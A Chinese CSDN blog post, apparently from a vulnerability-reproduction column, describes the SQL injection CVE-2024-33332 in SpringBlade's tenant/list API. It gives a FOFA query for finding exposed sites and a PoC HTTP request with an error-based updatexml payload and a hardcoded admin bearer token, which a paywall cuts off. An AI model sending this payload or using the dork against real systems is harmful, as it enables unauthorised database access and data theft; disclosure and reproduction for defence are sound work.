SpringBlade tenant/list SQL 注入漏洞复现( CVE-2024-33332)

已于 2024-06-07 21:54:43 修改
阅读量536 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 安全 web安全
于 2024-05-31 11:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139291854
版权

0x01 产品简介

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。

0x02 漏洞概述

SpringBlade 后台框架 /api/blade-system/tenant/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="https://bladex.vip/"

0x04 漏洞复现

PoC

GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
multi-tenant-app-demo:使用Spring Boot和Hibernate 5演示基于鉴别字段(共享模式)的多租户应用程序
01-30
示例应用程序使用Spring Boot和Hibernate演示基于鉴别符字段的多租户。 由于Hibernate(5.x)在支持基于“歧视者”的多租户策略时存在一些问题(请参阅下面的链接)。 下面的解决方法将有助于实现相同的目的。 ...
漏洞复现】(1day)Bladex快速开发平台sql注入漏洞
weixin_56297026的博客
12-20 1103
fofa语法:body="https://bladex.vip/"
复现SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2290
复现SpringBlade SQL 注入漏洞SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
SpringBlade dict-biz/list SQL 注入漏洞复现
0xSec
04-16 1319
SpringBlade 后台框架/api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SpringBlade error/list SQL 注入漏洞复现
0xSec
03-12 953
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现SpringBlade tenant/list SQL 注入漏洞
最新发布
siu~
06-03 531
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现SpringBlade error_list SQL 注入漏洞
https://blog.echo234.cn/
03-26 528
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。
漏洞复现SpringBlade export-user接口SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
01-22 1212
SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。
微服务架构SpringBlade其api接口存在2处SQL注入
qq_39342001的博客
03-19 466
SpringBlade 是一个由商业级项目升级优化而来的微服务架构,采用 Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。任何人在使用本文文中的信息时,应自行承担全部责任,并确保其符合所有相关法律和规定。本文中提及的所有技术和工具,都应在合法和道德的范围内使用。作者不鼓励或支持任何非法或不道德的行为,包括但不限于侵犯版权、侵犯隐私或违反任何其他法律。如果文档中包含任何第三方版权材料,版权归原作者所有,如有侵权,请联系作者进行处理。
SpringBlade error/list SQL 注入漏洞
云瀚安行
03-15 642
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
springblade.zip
04-08
SpringBlade是一个基于Spring Boot开发的现代化企业级应用框架,其2.7商业版提供了全套的jar包,旨在简化企业级开发工作,提高开发效率。本文将深入探讨SpringBlade框架的核心特性、主要组件以及如何在项目中进行...
activerecord-multi-tenant:RailsActiveRecord支持分布式多租户数据库,例如Postgres + Citus
02-05
gem 'activerecord-multi-tenant' 支持的Rails版本 支持从4.2或更高版本(最高6.0)开始的所有Ruby on Rails版本。 该gem仅支持ActiveRecord(Rails的默认ORM),而不支持诸如Sequel之类的替代ORM。 用法 要求
fusionpbx-4.2.zip_freeswitch_full_fusionpbx 4.2_multi-tenant_pbx
09-23
这个名为“fusionpbx-4.2.zip_freeswitch_full_fusionpbx 4.2_multi-tenant_pbx”的压缩包包含了构建和运行FusionPBX 4.2所需的所有组件和文件。下面我们将深入探讨这个系统的核心特点、功能以及它如何利用...
multi-tenant-node-red-manager:Web App,用于管理多租户节点-RED实例
05-24
$ git clone --recurse-submodules https://github.com/hardillb/multi-tenant-node-red-manager.git 配置 编辑settings.js文件以设置新实例的根域,以及有关如何连接到Docker的详细信息。 Docker设置应使用使用的...
sql注入详解
m0_67392811的博客
06-12 5804
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SpringBlade export-user SQL 注入漏洞复现
0xSec
12-19 1650
SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
漏洞复现】Saber企业级开发平台-SQL注入-list
知黑而守白
04-19 1259
受益于企业级前端应用开发平台 EDP ,它为项目管理、包管理、调试、构建、代码生成、代码检测、单元测试等各个环节提供解决方案,具备完善的工程化支持。Saber企业级开发平台 list 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
pigx /api/admin/tenant/list 502
05-24
这个错误通常意味着服务器无法连接到上游服务器或代理。502 Bad Gateway错误通常是中间代理服务器或网关服务器遇到问题时返回的错误。建议检查上游服务器是否可用,或者是否有任何与网络连接相关的问题。您可以尝试重新启动服务器或代理以解决此问题。如果问题仍然存在,请联系您的服务器管理员或网络服务提供商以获取进一步帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值